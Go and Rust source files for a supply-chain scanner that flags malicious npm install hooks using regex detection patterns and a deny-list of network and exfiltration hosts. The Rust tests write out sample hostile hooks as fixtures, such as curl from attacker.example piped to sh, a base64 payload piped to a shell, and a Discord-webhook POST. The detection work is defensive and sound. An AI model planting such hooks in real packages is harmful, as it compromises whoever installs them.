File: internal/infra/heuristics/install_hook.go
package heuristics

import (
	"encoding/json"
	"regexp"
	"strings"
)

// extractNpmScripts pulls every install-time script out of an npm
// package.json. Returns the script bodies (verbatim) for
// preinstall / install / postinstall / prepare. The other lifecycle
// scripts (test / start / build / ...) don't run at `npm install`
// time and aren't supply-chain vectors.
//
// Returns an empty slice if the manifest is unparseable or has no
// install hooks. Failure to parse is intentionally silent — the
// caller treats "no hooks" the same as "couldn't read".
func extractNpmScripts(raw []byte) map[string]string {
	if len(raw) == 0 {
		return nil
	}
	var pkg struct {
		Scripts map[string]string `json:"scripts"`
	}
	if err := json.Unmarshal(raw, &pkg); err != nil {
		return nil
	}
	out := make(map[string]string, 4)
	for _, phase := range []string{"preinstall", "install", "postinstall", "prepare"} {
		if body, ok := pkg.Scripts[phase]; ok && body != "" {
			out[phase] = body
		}
	}
	return out
}

// downloadExecPatterns matches "fetch and immediately execute" shell
// constructs. These are the canonical install-time backdoor shape.
// Compiled at package init so per-call cost is just a regex match.
var downloadExecPatterns = []*regexp.Regexp{
	// curl … | sh    (also handles `bash`, `zsh`, `python`, `node`)
	regexp.MustCompile(`(?i)\bcurl\b[^|;]+\|\s*(sh|bash|zsh|ksh|python\d?|node|ruby|perl)\b`),
	// wget … | sh
	regexp.MustCompile(`(?i)\bwget\b[^|;]+\|\s*(sh|bash|zsh|ksh|python\d?|node|ruby|perl)\b`),
	// fetch (BSD/macOS) … | sh
	regexp.MustCompile(`(?i)\bfetch\s+-[^|;]+\|\s*(sh|bash|zsh)\b`),
	// curl/wget fetching to a temp file then executing it
	regexp.MustCompile(`(?i)\b(curl|wget)\b[^;&|]+\s*&&\s*(sh|bash|chmod\s+\+x)\b`),
}

// inlineExecPatterns matches inline scripting from CLI flags — the
// other half of the canonical attack: short, hard-to-read, runs at
// install time. Each pattern captures the inline script body (group 2)
// so we can inspect it; benign one-liners like
// `node --eval "if (process.env.CI) process.exit(0)"` (the standard
// husky-skip-in-CI pattern) shouldn't trip the alarm.
var inlineExecPatterns = []*regexp.Regexp{
	regexp.MustCompile(`\b(node)\s+(?:-e|--eval)\s+(.+)$`),
	regexp.MustCompile(`\b(python\d?)\s+-c\s+(.+)$`),
	regexp.MustCompile(`\b(ruby|perl)\s+-e\s+(.+)$`),
	regexp.MustCompile(`\b(deno)\s+eval\s+(.+)$`),
}

// inlineBenignPattern matches inline scripts that, on inspection, are
// short control-flow one-liners — not download-and-execute payloads.
// Allows `node --eval "if (process.env.CI) process.exit(0)"` and similar
// CI-skip guards without flagging the whole prepare hook.
var inlineBenignPattern = regexp.MustCompile(
	`^[\s'"]*(?:if\s*\(?\s*)?process\.(?:env\.\w+|exit\s*\(\s*\d+\s*\)|argv|platform|version)`)

// inlineDangerSignals is a deny-list of substrings that, when found
// inside an inline -e/-c script body, indicate real risk: process
// spawning, dynamic require/import, network I/O, or filesystem writes.
var inlineDangerSignals = []string{
	"require(", "import(",
	"child_process", "execSync", "spawn", "exec(",
	"fetch(", "http.", "https.", "net.",
	"fs.write", "writeFileSync", "createWriteStream",
	"atob(", `Buffer.from`, "base64",
	"eval(", "Function(",
}

// inlineLengthThreshold — anything longer is treated as opaque enough
// to warrant a human look, even without a deny-list match.
const inlineLengthThreshold = 120

// inlineScriptIsSuspicious decides whether a captured inline body
// (the content after `-e` / `--eval` / `-c`) deserves a flag. Strips
// the surrounding quotes the shell would, then applies the deny-list.
// Short, deny-list-clean bodies pass.
func inlineScriptIsSuspicious(body string) bool {
	body = strings.TrimSpace(body)
	body = strings.TrimRight(body, "&|;")
	body = strings.TrimSpace(body)
	body = trimMatchingQuotes(body)
	if body == "" {
		return false
	}
	if len(body) > inlineLengthThreshold {
		return true
	}
	if inlineBenignPattern.MatchString(body) {
		return false
	}
	for _, sig := range inlineDangerSignals {
		if strings.Contains(body, sig) {
			return true
		}
	}
	return false
}

func trimMatchingQuotes(s string) string {
	if len(s) < 2 {
		return s
	}
	first, last := s[0], s[len(s)-1]
	if (first == '"' || first == '\'') && first == last {
		return s[1 : len(s)-1]
	}
	return s
}

// base64PipedPattern matches a base64 blob piped into a shell —
// classic obfuscation for download-execute payloads.
var base64PipedPattern = regexp.MustCompile(
	`(?i)\b(echo|printf)\b\s+['"]?[A-Za-z0-9+/]{40,}={0,2}['"]?[^|]*\|\s*(base64\s+(-d|--decode)|openssl\s+base64\s+-d)`)

// suspiciousHookHostPattern matches install hooks that talk to
// well-known C2 / exfil hosts. We keep this small — the canonical
// pattern is curl|sh, and host-blocklists go stale; better to tag
// the broad pattern and let the user investigate the URL itself.
var suspiciousHookHostPattern = regexp.MustCompile(
	`(?i)\b(curl|wget|fetch)\b[^;|]*\b(pastebin\.com|paste\.ee|hastebin\.com|transfer\.sh|file\.io|0x0\.st|ngrok\.io|trycloudflare\.com|discord(?:app)?\.com/api/webhooks|api\.telegram\.org/bot)`)

func scriptMatchesMalwarePattern(body string) bool {
	body = strings.TrimSpace(body)
	if body == "" {
		return false
	}
	for _, re := range downloadExecPatterns {
		if re.MatchString(body) {
			return true
		}
	}
	for _, re := range inlineExecPatterns {
		m := re.FindStringSubmatch(body)
		// Every pattern in inlineExecPatterns is shaped `(lang)…(body)`,
		// so a match always has m[0..2]. Guard anyway so a future
		// pattern edit can't silently turn a flag into a panic.
		if len(m) < 3 {
			continue
		}
		// Only the node case gets the benign carve-out — `node --eval
		// "if (process.env.CI) process.exit(0)"` is the standard
		// husky-skip-in-CI prepare hook and shouldn't trip us.
		// python/ruby/perl/deno -e payloads are rarely seen outside
		// of attacker payloads, so keep flagging them unconditionally.
		if m[1] != "node" {
			return true
		}
		if inlineScriptIsSuspicious(m[2]) {
			return true
		}
	}
	if base64PipedPattern.MatchString(body) {
		return true
	}
	if suspiciousHookHostPattern.MatchString(body) {
		return true
	}
	// Silent-exit runner: `bun run payload.js && exit 1`
	// The `&& exit N` construct in a prepare/postinstall hook is
	// specifically designed to suppress npm's error output after the
	// payload runs. No legitimate hook needs this.
	if silentExitRunnerPattern.MatchString(body) {
		return true
	}
	// Non-standard runtime: `bun run <localfile>` in an install hook.
	// bun is almost never a declared dep of published libraries; its
	// presence in a postinstall/prepare script is anomalous and was the
	// specific shape used in the 2026 Mini Shai-Hulud attack.
	if bunLocalRunPattern.MatchString(body) {
		return true
	}
	return false
}

// silentExitRunnerPattern matches a local-script runner followed by
// `&& exit N`. The forced exit after a script run is specifically used
// to make npm silently discard the hook's exit status, hiding the fact
// that malware ran. Pattern: (bun|npx|deno) [run] <file.ext> && exit N
var silentExitRunnerPattern = regexp.MustCompile(
	`(?i)\b(bun|npx|deno)\s+(run\s+)?\S+\.(js|ts|mjs|cjs|tsx|jsx)\s*&&\s*exit\s+[0-9]+`)

// bunLocalRunPattern matches `bun run <localfile>` in isolation (without
// the && exit N suffix). bun is not a standard dep of published packages;
// any postinstall referencing it as a script runner is unusual enough to
// warrant inspection, even without the silence trick.
var bunLocalRunPattern = regexp.MustCompile(
	`(?i)\bbun\s+run\s+\S+\.(js|ts|mjs|cjs)`)

File: crates/aegis-heuristics/src/install_hook.rs
//! Install-hook malware detector. Port of `install_hook.go` +
//! `check_install_hooks.go`.
//!
//! Flags [`Capability::InstallHookSuspicious`] when any declared
//! install-time / build-time lifecycle hook matches a known
//! malware-distribution shape: download-and-execute (`curl … | sh`),
//! inline `-e`/`-c` eval of a dangerous body, base64 piped to a shell,
//! a fetch to a known C2/exfil host, a silent-exit runner, or a
//! non-standard-runtime local-file runner. Split-string concatenation
//! (`"cur" + "l"`) is collapsed before matching so obfuscation can't hide
//! the payload.

use std::sync::OnceLock;

use aegis_domain::Capability;
use regex::Regex;

use crate::NormalizedPackage;

fn re(s: &str) -> Regex {
    Regex::new(s).unwrap()
}

/// "fetch and immediately execute" shell constructs — the canonical
/// install-time backdoor shape.
fn download_exec_patterns() -> &'static [Regex] {
    static R: OnceLock<Vec<Regex>> = OnceLock::new();
    R.get_or_init(|| {
        vec![
            // curl … | sh   (also bash/zsh/python/node/ruby/perl)
            re(r"(?i)\bcurl\b[^|;]+\|\s*(sh|bash|zsh|ksh|python\d?|node|ruby|perl)\b"),
            // wget … | sh
            re(r"(?i)\bwget\b[^|;]+\|\s*(sh|bash|zsh|ksh|python\d?|node|ruby|perl)\b"),
            // fetch (BSD/macOS) … | sh
            re(r"(?i)\bfetch\s+-[^|;]+\|\s*(sh|bash|zsh)\b"),
            // curl/wget to a temp file then executing it
            re(r"(?i)\b(curl|wget)\b[^;&|]+\s*&&\s*(sh|bash|chmod\s+\+x)\b"),
        ]
    })
}

/// Inline scripting from CLI flags. Group 1 = interpreter, group 2 = body.
fn inline_exec_patterns() -> &'static [Regex] {
    static R: OnceLock<Vec<Regex>> = OnceLock::new();
    R.get_or_init(|| {
        vec![
            re(r"\b(node)\s+(?:-e|--eval)\s+(.+)$"),
            re(r"\b(python\d?)\s+-c\s+(.+)$"),
            re(r"\b(ruby|perl)\s+-e\s+(.+)$"),
            re(r"\b(deno)\s+eval\s+(.+)$"),
        ]
    })
}

/// Short control-flow one-liners that are NOT download-execute payloads —
/// e.g. `node --eval "if (process.env.CI) process.exit(0)"` (husky CI-skip).
fn inline_benign_pattern() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| {
        re(r#"^[\s'"]*(?:if\s*\(?\s*)?process\.(?:env\.\w+|exit\s*\(\s*\d+\s*\)|argv|platform|version)"#)
    })
}

fn base64_piped_pattern() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| {
        re(r#"(?i)\b(echo|printf)\b\s+['"]?[A-Za-z0-9+/]{40,}={0,2}['"]?[^|]*\|\s*(base64\s+(-d|--decode)|openssl\s+base64\s+-d)"#)
    })
}

fn suspicious_hook_host_pattern() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| {
        re(r"(?i)\b(curl|wget|fetch)\b[^;|]*\b(pastebin\.com|paste\.ee|hastebin\.com|transfer\.sh|file\.io|0x0\.st|ngrok\.io|trycloudflare\.com|discord(?:app)?\.com/api/webhooks|api\.telegram\.org/bot)")
    })
}

/// Local-script runner followed by `&& exit N` — used to make npm silently
/// discard the hook's exit status, hiding that malware ran.
fn silent_exit_runner_pattern() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| {
        re(r"(?i)\b(bun|npx|deno)\s+(run\s+)?\S+\.(js|ts|mjs|cjs|tsx|jsx)\s*&&\s*exit\s+[0-9]+")
    })
}

/// Non-standard runtime invocation of a local script file (bun/deno/npx
/// running a `.js`/`.ts`/… file). Anomalous in a published package's
/// lifecycle scripts even without the silent-exit trick.
fn non_standard_runtime_pattern() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| {
        re(r"(?i)\b(?:bun\s+run\s+|deno\s+(?:run\s+)?|npx\s+)\S+\.(js|ts|mjs|cjs|tsx|jsx)")
    })
}

fn concat_join_pattern() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| re(r#"["']\s*\+\s*["']"#))
}

/// Deny-list substrings that, inside an inline `-e`/`-c` body, indicate real
/// risk: process spawning, dynamic require/import, network I/O, fs writes.
const INLINE_DANGER_SIGNALS: &[&str] = &[
    "require(",
    "import(",
    "child_process",
    "execSync",
    "spawn",
    "exec(",
    "fetch(",
    "http.",
    "https.",
    "net.",
    "fs.write",
    "writeFileSync",
    "createWriteStream",
    "atob(",
    "Buffer.from",
    "base64",
    "eval(",
    "Function(",
];

/// Anything longer is treated as opaque enough to warrant a human look.
const INLINE_LENGTH_THRESHOLD: usize = 120;

fn trim_matching_quotes(s: &str) -> &str {
    let b = s.as_bytes();
    if b.len() < 2 {
        return s;
    }
    let (first, last) = (b[0], b[b.len() - 1]);
    if (first == b'"' || first == b'\'') && first == last {
        return &s[1..s.len() - 1];
    }
    s
}

/// Decide whether a captured inline body (content after `-e`/`--eval`/`-c`)
/// deserves a flag. Short, deny-list-clean bodies pass.
fn inline_script_is_suspicious(body: &str) -> bool {
    let body = body.trim();
    let body = body.trim_end_matches(['&', '|', ';']);
    let body = body.trim();
    let body = trim_matching_quotes(body);
    if body.is_empty() {
        return false;
    }
    if body.len() > INLINE_LENGTH_THRESHOLD {
        return true;
    }
    if inline_benign_pattern().is_match(body) {
        return false;
    }
    INLINE_DANGER_SIGNALS.iter().any(|sig| body.contains(sig))
}

/// Collapse adjacent string-literal concatenations (`"cur" + "l"` → `"curl"`)
/// repeatedly until stable, handling chains like `"c"+"u"+"r"+"l"`.
fn deobfuscate_concat(body: &str) -> String {
    let mut body = body.to_string();
    for _ in 0..50 {
        let next = concat_join_pattern().replace_all(&body, "").into_owned();
        if next == body {
            break;
        }
        body = next;
    }
    body
}

fn match_malware_patterns(body: &str) -> bool {
    if download_exec_patterns().iter().any(|re| re.is_match(body)) {
        return true;
    }
    for re in inline_exec_patterns() {
        if let Some(caps) = re.captures(body) {
            let (Some(lang), Some(inner)) = (caps.get(1), caps.get(2)) else {
                continue;
            };
            // Only node gets the benign carve-out; python/ruby/perl/deno -e
            // payloads are rarely benign, so flag unconditionally.
            if lang.as_str() != "node" {
                return true;
            }
            if inline_script_is_suspicious(inner.as_str()) {
                return true;
            }
        }
    }
    if base64_piped_pattern().is_match(body) {
        return true;
    }
    if suspicious_hook_host_pattern().is_match(body) {
        return true;
    }
    if silent_exit_runner_pattern().is_match(body) {
        return true;
    }
    if non_standard_runtime_pattern().is_match(body) {
        return true;
    }
    false
}

/// True when a shell-snippet matches any download-execute / inline-eval /
/// base64-piped / suspicious-host / silent-exit / non-standard-runtime
/// pattern. Checks the body verbatim and with split-string concatenations
/// collapsed.
pub fn script_matches_malware_pattern(body: &str) -> bool {
    let body = body.trim();
    if body.is_empty() {
        return false;
    }
    if match_malware_patterns(body) {
        return true;
    }
    let d = deobfuscate_concat(body);
    d != body && match_malware_patterns(&d)
}

/// Fires when any declared install/build hook matches a known malware pattern.
pub fn check_install_hooks(pkg: &NormalizedPackage) -> Vec<Capability> {
    if pkg
        .hooks
        .iter()
        .any(|h| script_matches_malware_pattern(&h.body))
    {
        return vec![Capability::InstallHookSuspicious];
    }
    Vec::new()
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::manifest::parse_npm_manifest;
    use std::collections::HashMap;

    fn hooks_from(manifest: &str) -> NormalizedPackage {
        parse_npm_manifest("", manifest.as_bytes(), HashMap::new())
    }

    fn flags(scripts_json: &str) -> bool {
        let manifest = format!(r#"{{"scripts": {scripts_json}}}"#);
        !check_install_hooks(&hooks_from(&manifest)).is_empty()
    }

    #[test]
    fn malicious_hooks_flagged() {
        let bad = [
            r#"{"postinstall": "curl -sSL http://attacker.example/payload | sh"}"#,
            r#"{"postinstall": "wget -qO- http://x/y | bash"}"#,
            r#"{"install": "node -e \"require('child_process').exec('curl ...')\""}"#,
            r#"{"postinstall": "python3 -c 'import urllib.request; urllib.request.urlretrieve(\"x\")'"}"#,
            r#"{"postinstall": "echo Y3VybCBodHRwczovL2F0dGFja2VyLmNvbXxiYXNo | base64 -d | sh"}"#,
            r#"{"postinstall": "curl -X POST https://discord.com/api/webhooks/111/aaa -d x"}"#,
            r#"{"install": "curl http://abc.ngrok.io/payload | sh"}"#,
            r#"{"postinstall": "node -e \"require('https').get('https://x.com/p')\""}"#,
        ];
        for s in bad {
            assert!(flags(s), "should flag: {s}");
        }
    }

    #[test]
    fn node_eval_long_opaque_body_flagged() {
        let long = "a".repeat(130);
        let s = format!(r#"{{"postinstall": "node -e \"{long}\""}}"#);
        assert!(flags(&s));
    }

    #[test]
    fn legit_hooks_not_flagged() {
        let good = [
            r#"{"postinstall": "node-gyp rebuild"}"#,
            r#"{"postinstall": "patch-package"}"#,
            r#"{"postinstall": "husky install"}"#,
            r#"{"prepare": "node --eval \"if (process.env.CI) process.exit(0)\" && husky || true"}"#,
            r#"{"prepare": "node -e \"process.exit(0)\""}"#,
            // curl in `test` isn't an install-time hook — parser drops it
            r#"{"test": "curl localhost | jest"}"#,
        ];
        for s in good {
            assert!(!flags(s), "should NOT flag: {s}");
        }
    }

    #[test]
    fn nonstandard_runtime_and_silent_exit_flagged() {
        let bad = [
            r#"{"prepare": "bun run tanstack_runner.js && exit 1"}"#,
            r#"{"postinstall": "bun run setup.js && exit 0"}"#,
            r#"{"postinstall": "npx run payload.mjs && exit 1"}"#,
            r#"{"postinstall": "deno run payload.ts && exit 1"}"#,
            r#"{"postinstall": "bun run install_hook.js"}"#,
            r#"{"postinstall": "deno run payload.ts"}"#,
        ];
        for s in bad {
            assert!(flags(s), "should flag: {s}");
        }
    }

    #[test]
    fn bun_deno_install_are_legit() {
        assert!(!flags(r#"{"prepare": "bun install"}"#));
        assert!(!flags(r#"{"prepare": "deno install"}"#));
    }

    #[test]
    fn no_scripts_no_signal() {
        assert!(check_install_hooks(&hooks_from(r#"{"name": "x"}"#)).is_empty());
        // broken JSON → no hooks → no signal
        assert!(check_install_hooks(&hooks_from("{ not json")).is_empty());
    }

    #[test]
    fn defeats_concat_obfuscation() {
        let bad = [
            r#""cur" + "l -fsSL http://evil.example/x.sh | sh""#,
            r#""cu"+"rl htt"+"p://evil.example | ba"+"sh""#,
            r#"'curl http://evil.example | ' + 'sh'"#,
        ];
        for s in bad {
            assert!(script_matches_malware_pattern(s), "expected match: {s}");
        }
        let good = [
            r#"console.log("hello " + "world")"#,
            r#""build" + "/output""#,
        ];
        for s in good {
            assert!(!script_matches_malware_pattern(s), "false positive: {s}");
        }
    }
}
